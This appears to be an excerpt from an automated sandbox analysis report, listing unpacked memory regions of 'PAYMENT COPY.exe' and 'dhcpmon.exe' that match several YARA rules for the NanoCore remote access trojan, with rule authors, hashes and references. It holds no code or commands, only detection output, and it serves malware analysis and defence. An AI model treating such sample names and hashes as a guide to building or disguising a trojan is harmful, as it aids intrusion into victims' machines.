    Source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.2.dhcpmon.exe.3317815.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.3317815.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.6b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.33131ec.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.33131ec.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.3663937.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.3663937.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.6a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.6a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.710000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.710000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.27bb8ec.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.27bb8ec.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.680000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.680000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 1.2.PAYMENT COPY.exe.730000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.730000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.33131ec.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.33131ec.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.PAYMENT COPY.exe.780000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 1.2.PAYMENT COPY.exe.780000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
